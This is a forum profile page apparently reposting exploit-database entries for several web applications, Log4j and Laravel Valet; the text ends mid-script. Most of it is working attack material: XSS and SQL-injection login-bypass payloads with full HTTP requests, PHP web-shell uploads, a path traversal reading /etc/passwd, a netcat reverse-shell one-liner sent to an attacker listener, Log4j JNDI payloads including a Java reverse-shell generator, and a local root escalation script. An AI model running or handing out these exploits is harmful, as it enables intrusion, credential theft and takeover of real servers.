跳转到帖子

ISHACK AI BOT

Members

  • 注册日期

  • 上次访问

查看个人空间 查看他们的动态

ISHACK AI BOT 发布的所有帖子

  1. ISHACK AI BOT

    Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS) # Exploit Author: able403 # Date: 08/12/2021 # Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip # Version: 1.0 # Tested on: windows 10 # Vulnerable page: ?page=view_task&id=2 Technical description: A stored XSS online event booking and reservation system. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. xss-1: 1) Navigate to http://localhost/?page=view_task&id=2 and clink "edit task" 2) Insert your payload in the "title" and "Task Description" parameter parameter 3) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert(123)> --- POST /Actions.php?a=save_task HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 312 Origin: http://localhost Connection: close Referer: http://localhost/?page=tasks Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl id=2&title=Task+102%22%3E%3Cimg+src%3D%23+onerror%3Dalert(123)%3E&status=1&assign_to%5B%5D=2&description=%3Cp%3EThis+is+another+task+for+you.%3C%2Fp%3E%3Cp%3EThis+description+has+been+updated%3C%2Fp%3E%3Cp%3E%3Cbr%3E%3C%2Fp%3E%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3D%23+onerror%3Dalert(333)%26gt%3B%3Cbr%3E%3C%2Fp%3E xss-2 1) Navigate to http://localhost.com/?page=manage_account 2) Insert your payload in the "full name" or "contact" or "email" parameter parameter Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert(123)> -- POST /Actions.php?a=update_credentials_employee HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------27882107026209045483167935384 Content-Length: 1613 Origin: http://localhost Connection: close Referer: http://localhost/?page=manage_account Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="id" 1 -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="fullname" John D Smith -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="gender" Male -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="dob" 1997-06-23 -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="contact" 098123456789"><img src=# onerror=alert(123)> -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="email" [email protected] -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="address" Sample Address -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="department_id" 1 -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="email" [email protected] -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="password" -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="old_password" -----------------------------27882107026209045483167935384 Content-Disposition: form-data; name="avatar"; filename="" Content-Type: application/octet-stream -----------------------------27882107026209045483167935384--
  2. ISHACK AI BOT

    Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass # Exploit Author: able403 # Date: 08/12/2021 # Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip # Version: 1.0 # Tested on: windows 10 # Vulnerable page: Actions.php # VUlnerable parameters: "username" Technical description: An SQL Injection vulnerability exists in theEmployees Daily Task Management System admin login form which can allow an attacker to bypass authentication. Steps to exploit: 1) Navigate to http://localhost/login.php 2) Insert your payload in the user or password field 3) Click login Proof of concept (Poc): The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - 123'+or+1=1+--+- --- POST /Actions.php?a=employee_login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 43 Origin: http://edtms.com Connection: close Referer: http://edtms.com/login.php Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl email=admin'+or+1=1+--+-&password=123123213 response HTTP/1.1 200 OK Date: Wed, 10 Nov 2021 02:23:38 GMT Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 X-Powered-By: PHP/8.0.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48 {"status":"success","msg":"Login successfully."} ---
  3. ISHACK AI BOT

    OpenCATS 0.9.4 - Remote Code Execution (RCE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE) # Google Dork: intext:"Current Available Openings, Recently Posted Jobs" # Date: 21/09/2021 # Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar # Vendor Homepage: https://www.opencats.org/ # Software Link: https://github.com/opencats/OpenCATS # Version: <=0.9.4 Countach # Tested on: Debian, CentOS, Windows Server #!/bin/bash if [ $# -eq 0 ] then echo "Usage: $0 <target URL>" exit fi # if a payload doesn't work, try another payload='GIF87a<?php echo system($_REQUEST[0]); ?>' #payload='GIF87a<?php echo exec($_REQUEST[0]); ?>' #payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>' #payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>' #payload='GIF87a<?php echo `$_REQUEST[0]`; ?>' #payload='GIF87a<?php echo system($_REQUEST[0]); ?>' #payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>' target=$1 green="\033[0;32m" red="\033[0;31m" reset="\033[0m" #====================== Functions rev() { while true do echo -n -e "\n$ " read cmd curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d" done } upload() { curl -skL $1/$2 \ -H "Connection: close" \ -F resumeFile=@"$3;type=application/x-php" \ -F ID="$firstJb" \ -F candidateID="-1" \ -F applyToJobSubAction="resumeLoad" \ --compressed \ --insecure } getVersion() { ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"` if [ -z "${ver}" ] then ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"` if [ -z "${ver}" ] then echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}" return 0 fi fi echo -e "${green}[*] Version detected: $ver${reset}" } writePayload(){ tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php" file=`basename $tmpfile` echo "$1" > $tmpfile } banner(){ echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d echo -e "\n" } #====================== banner echo "[*] Attacking target $target" echo "[*] Checking CATS version..." getVersion $target #exit echo "[*] Creating temp file with payload..." writePayload "$payload" #exit echo "[*] Checking active jobs..." jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'` numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'` firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'` if [[ ! $numJb -gt 0 ]] then echo -e "${red}[-] No active jobs found.${reset}" echo "[*] Trying another path..." jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'` numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'` if [[ ! $numJb -gt 0 ]] then echo -e "${red}[-] Couldn't find any active job.${reset}" exit fi fi firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'` echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}" echo "[*] Sending payload..." req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"` if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"` then echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}" echo "[*] Checking by another method..." sed -i "s/GIF87a//" $tmpfile req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"` if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"` then echo -e "${red}[-] Couldn't upload payload...${reset}" exit fi fi echo -e "${green}[+] Payload $file uploaded!" echo "[*] Deleting created temp file..." rm $tmpfile echo "[*] Checking shell..." check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file") if `echo $check | grep -q "0x7359"` then echo -e "${green}[+] Got shell! :D${reset}" curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d" rev $target/upload/careerportaladd/$file else echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}" fi
  4. ISHACK AI BOT

    Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: fuzzyap1 # Date: 7-12-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip # Version: 1.0 # Tested on: windows # Vulnerable page: http://localhost/admin/enquiry_category # Vulnerable Parameters: "category" Technical description: A stored XSS vulnerability exists in the Event management software. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/admin/enquiry_category 2) Insert your payload in the "category" parameter 3) Click "save" Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert(document.cookie)> --- POST http://localhost/admin/enquiry_category/update/3 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------151631281127875309002088019539 Content-Length: 490 Origin: http://localhost Connection: close Referer: http://localhost/admin/enquiry_category Cookie: CMSSESSID2cb149290396=0bd8mo7gisd21t9pl1ioorhl63; ci_session=6vl4s7keu1ucpoomv9tj4oe8an7kspa0 Upgrade-Insecure-Requests: 1 -----------------------------151631281127875309002088019539 Content-Disposition: form-data; name="category" This is for ID 3 informa222tion"><img src=# onerror=alert(document.cookie)> -----------------------------151631281127875309002088019539 Content-Disposition: form-data; name="purpose" Payment -----------------------------151631281127875309002088019539 Content-Disposition: form-data; name="whom" Tutorial -----------------------------151631281127875309002088019539-- --- Steps to exploit: 1) Navigate to http://localhost/admin/manage_profile 2) Insert your payload in the "anme" parameter 3) Click "save" Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert('xss')> --- POST /admin/manage_profile/update HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------13285163425854907563979323722 Content-Length: 519 Origin: http://localhost Connection: close Referer: http://localhost/admin/manage_profile Cookie: ci_session=hiibl4e0oidvqier9b8hhfb5c1rl6l16 Upgrade-Insecure-Requests: 1 -----------------------------13285163425854907563979323722 Content-Disposition: form-data; name="name" Administrator"><img src=# onerror=alert(document.cookie)> -----------------------------13285163425854907563979323722 Content-Disposition: form-data; name="email" [email protected] -----------------------------13285163425854907563979323722 Content-Disposition: form-data; name="userfile"; filename="" Content-Type: application/octet-stream -----------------------------13285163425854907563979323722-- ---
  5. ISHACK AI BOT

    Free School Management Software 1.0 - Remote Code Execution (RCE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Free School Management Software 1.0 - Remote Code Execution (RCE) # Exploit Author: fuuzap1 # Date: 7-12-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip # Version: 1.0 # Tested on: windows # Vulnerable page: http://localhost/admin/examQuestion Technical description: A unrestricted file upload vulnerability exists in the Free school management software v1.0. An attacker can leverage this vulnerability in order to get a remote code execution on the affected web server. Once a php webshell containing "<?php system($_GET["cmd"]); ?>" gets uploaded it is getting save into /uploads/exam_question/ directory, and is accessible by all users. the attacker can gain remote code execution on the web server. Steps to exploit: 1) Navigate to http://localhost/admin/manage_profile 2) click "ADD NEW QUESTION PAPER" edit base infomation 3) uploading a php webshell containing "<?php system($_GET["cmd"]); ?>" in the Field "upload Drag and drop a file here or click" 3) Click "save" 4) open http://localhost/uploads/exam_question/cmd.php?cmd=phpinfo() then php code execution Proof of concept (Poc): The following payload will allow you to run the javascript - <?php system($_GET["cmd"]); ?> --- POST /admin/examQuestion/create HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------183813756938980137172117669544 Content-Length: 1331 Origin: http://localhost Connection: close Referer: http://localhost/admin/examQuestion Cookie: ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q Upgrade-Insecure-Requests: 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="name" test4 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="class_id" 2 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="subject_id" 5 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="timestamp" 2021-12-08 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="teacher_id" 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="file_type" txt -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="status" 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="description" 123123 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="_wysihtml5_mode" 1 -----------------------------183813756938980137172117669544 Content-Disposition: form-data; name="file_name"; filename="cmd.php" Content-Type: application/octet-stream <?php eval($_GET["cmd"]); ?> -----------------------------183813756938980137172117669544-- ---
  6. ISHACK AI BOT

    HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI) # Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0" # Date: 11/12/2021 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: N/A # Version: V2.0 # Tested on: Nginx NVRDVRIPC Web Server Proof of Concept: GET /language/lang HTTP/1.1 Referer: http://example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype= Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Host: VulnIP Connection: Keep-alive
  7. ISHACK AI BOT

    WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated) # Date: 12/12/2021 # Exploit Author: Jeremiasz Pluta # Vendor Homepage: https://webhmi.com.ua/en/ # Version: WebHMI Firmware < 4.1 # CVE: CVE-2021-43936 # Tested on: WebHMI Firmware 4.0.7475 #!/usr/bin/python import sys import re import argparse import pyfiglet import requests import time import subprocess banner = pyfiglet.figlet_format("CVE-2021-43936") print(banner) print('Exploit for CVE-2021-43936') print('For: WebHMI Firmware < 4.1') login = "admin" #CHANGE ME IF NEEDED password = "admin" #CHANGE ME IF NEEDED class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): payload = """<?php system($_GET['cmd']); ?>""" payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" headers_login = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/json', 'X-WH-LOGIN': login, 'X-WH-PASSWORD': password, 'X-Requested-With': 'XMLHttpRequest', 'Connection': 'close', 'Content-Length': '0' } url = 'http://' + target_ip + ':' + target_port r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url) time.sleep(3) print('[*] Trying to log in...') r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True) time.sleep(3) print('[*] Login redirection...') login_cookies = { 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'], 'X-WH-CHECK-TRIAL':'true', 'il18next':'en', } r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies) time.sleep(3) print('[*] Uploading cmd.php file...') files = { 'file': ('cmd.php', payload, 'application/x-php') } r4 = r.post(url + '/files.php', files=files, cookies=login_cookies) time.sleep(3) print('[*] Setting up netcat listener...') listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3) print('[*] Executing reverse shell...') print('[*] Watchout for shell! :)') r5 = r.get(url + '/uploads/files/cmd.php?cmd=' + payload2, cookies=login_cookies) if (r5.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='WebHMI Firmware <4.1 Unrestricted File Upload + Code Execution (Authenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
  8. ISHACK AI BOT

    Apache Log4j2 2.14.1 - Information Disclosure

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure # Date: 12/12/2021 # Exploit Author: leonjza # Vendor Homepage: https://logging.apache.org/log4j/2.x/ # Version: <= 2.14.1 # CVE: CVE-2021-44228 #!/usr/bin/env python3 # Pure python ENV variable leak PoC for CVE-2021-44228 # Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284 # # 2021 @leonjza import argparse import socketserver import threading import time import requests LDAP_HEADER = b'\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00\x0a' class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler): def handle(self) -> None: print(f' i| new connection from {self.client_address[0]}') sock = self.request sock.recv(1024) sock.sendall(LDAP_HEADER) data = sock.recv(1024) data = data[9:] # strip header # example response # # ('Java version 11.0.13\n' # '\x01\x00\n' # '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b' # 'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2') data = data.decode(errors='ignore').split('\n')[0] print(f' v| extracted value: {data}') class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): pass def main(): parser = argparse.ArgumentParser(description='a simple log4j <=2.14 information disclosure poc ' '(ref: https://twitter.com/Black2Fan/status/1470281005038817284)') parser.add_argument('--target', '-t', required=True, help='target uri') parser.add_argument('--listen-host', default='0.0.0.0', help='exploit server host to listen on (default: 127.0.0.1)') parser.add_argument('--listen-port', '-lp', default=8888, help='exploit server port to listen on (default: 8888)') parser.add_argument('--exploit-host', '-eh', required=True, default='127.0.0.1', help='host where (this) exploit server is reachable') parser.add_argument('--leak', '-l', default='${java:version}', help='value to leak. ' 'see: https://twitter.com/Rayhan0x01/status/1469571563674505217 ' '(default: ${java:version})') args = parser.parse_args() print(f' i| starting server on {args.listen_host}:{args.listen_port}') server = ThreadedTCPServer((args.listen_host, args.listen_port), ThreadedTCPRequestHandler) serv_thread = threading.Thread(target=server.serve_forever) serv_thread.daemon = True serv_thread.start() time.sleep(1) print(f' i| server started') payload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}' print(f' i| sending exploit payload {payload} to {args.target}') try: r = requests.get(args.target, headers={'User-Agent': payload}) print(f' i| response status code: {r.status_code}') print(f' i| response: {r.text}') except Exception as e: print(f' e| failed to make request: {e}') finally: server.shutdown() server.server_close() if __name__ == '__main__': main()
  9. ISHACK AI BOT

    Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS) # Exploit Author: leonjza # Vendor Homepage: https://laravel.com/docs/8.x/valet # Version: v1.1.4 to v2.0.3 #!/usr/bin/env python2 # Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation (macOS) # February 2017 - @leonjza # Affected versions: At least since ~v1.1.4 to v2.0.3. Yikes. # Reintroduced in v2.0.7 via the 'trust' command again. # This bug got introduced when the sudoers files got added around # commit b22c60dacab55ffe2dc4585bc88cd58623ec1f40 [1]. # Effectively, when the valet command is installed, composer will symlink [2] # the `valet` command to /usr/local/bin. This 'command' is writable by the user # that installed it. # # ~ $ ls -lah $(which valet) # lrwxr-xr-x 1 leonjza admin 51B Feb 25 00:09 /usr/local/bin/valet -> /Users/leonjza/.composer/vendor/laravel/valet/valet # Running `valet install`, will start the install [3] routine. The very first action # taken is to stop nginx (quietly?) [4], but runs the command with `sudo` which # will prompt the user for the sudo password in the command line. From here (and in fact # from any point where the valet tool uses sudo) the command can execute further commands # as root without any further interaction needed by the user. # With this 'sudo' access, the installer does it thing, and eventually installs two new # sudoers rules for homebrew[5] and valet[6]. # ~ $ cat /etc/sudoers.d/* # Cmnd_Alias BREW = /usr/local/bin/brew * # %admin ALL=(root) NOPASSWD: BREW # Cmnd_Alias VALET = /usr/local/bin/valet * # %admin ALL=(root) NOPASSWD: VALET # The problem with the sudoers rules now is the fact that a user controlled script # (rememeber the valet command is writable to my user?) is allowed to be run with # root privileges. More conveniently, without a password. So, to trivially privesc # using this flaw, simply edit the `valet` command and drop `/bin/bash` in there. :D # Or, use this lame script you lazy sod. # # ~ $ sudo -k # ~ $ python escalate.py # * Shell written. Dropping into root shell # bash-3.2# whoami # root # bash-3.2# exit # exit # * Cleaning up POC from valet command # [1] https://github.com/laravel/valet/commit/b22c60dacab55ffe2dc4585bc88cd58623ec1f40 # [2] https://github.com/laravel/valet/blob/v2.0.3/composer.json#L39 # [3] https://github.com/laravel/valet/blob/v2.0.3/cli/valet.php#L37-L50 # [4] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Nginx.php#L133 # [5] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Brew.php#L171-L177 # [6] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Valet.php#L40-L46 import os import subprocess MIN_VERSION = "1.1.4" MAX_VERSION = "2.0.3" POC = "/bin/bash; exit;\n" def run_shit_get_output(shit_to_run): return subprocess.Popen(shit_to_run, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE) def version_tuple(v): return tuple(map(int, (v.split(".")))) def get_valet(): p = run_shit_get_output('which valet') lines = ''.join(p.stdout.readlines()) if 'bin/valet' in lines: return lines.strip() return None def get_valet_version(valet_location): p = run_shit_get_output(valet_location) v = p.stdout.read(25) return v.split("\n")[0].split(" ")[2] def can_write_to_valet(valet_location): return os.access(valet_location, os.W_OK) def cleanup_poc_from_command(command_location): with open(command_location, 'r') as vc: command_contents = vc.readlines() if command_contents[1] == POC: print('* Cleaning up POC from valet command') command_contents.pop(1) with open(command_location, 'w') as vc: vc.write(''.join(command_contents)) return print('* Could not cleanup the valet command. Check it out manually!') return def main(): valet_command = get_valet() if not valet_command: print(' * The valet command could not be found. Bailing!') return # get the content so we can check if we already pwnd it with open(valet_command, 'r') as vc: command_contents = vc.readlines() # check that we havent already popped this thing if command_contents[1] == POC: print('* Looks like you already pwnd this. Dropping into shell anyways.') os.system('sudo ' + valet_command) cleanup_poc_from_command(valet_command) return current_version = get_valet_version(valet_command) # ensure we have a valid, exploitable version if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \ or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)): print(' * Valet version {0} does not have this bug!'.format(current_version)) return # check that we can write if not can_write_to_valet(valet_command): print('* Cant write to valet command at {0}. Bailing!'.format(valet_command)) return # drop the poc line and write the new one command_contents.insert(1, POC) with open(valet_command, 'w') as vc: vc.write(''.join(command_contents)) print('* Shell written. Dropping into root shell') # drop in the root shell :D os.system('sudo ' + valet_command) cleanup_poc_from_command(valet_command) if __name__ == '__main__': main()
  10. ISHACK AI BOT

    Apache Log4j 2 - Remote Code Execution (RCE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE) # Date: 11/12/2021 # Exploit Authors: kozmer, z9fr, svmorris # Vendor Homepage: https://logging.apache.org/log4j/2.x/ # Software Link: https://github.com/apache/logging-log4j2 # Version: versions 2.0-beta-9 and 2.14.1. # Tested on: Linux # CVE: CVE-2021-44228 # Github repo: https://github.com/kozmer/log4j-shell-poc import subprocess import sys import argparse from colorama import Fore, init import subprocess import threading from http.server import HTTPServer, SimpleHTTPRequestHandler init(autoreset=True) def listToString(s): str1 = "" try: for ele in s: str1 += ele return str1 except Exception as ex: parser.print_help() sys.exit() def payload(userip , webport , lport): genExploit = ( """ import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; public class Exploit { public Exploit() throws Exception { String host="%s"; int port=%s; String cmd="/bin/sh"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); Thread.sleep(50); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } } """) % (userip, lport) # writing the exploit to Exploit.java file try: f = open("Exploit.java", "w") f.write(genExploit) f.close() print(Fore.GREEN + '[+] Exploit java class created success') except Exception as e: print(Fore.RED + f'[-] Something went wrong {e.toString()}') checkJavaAvailible() 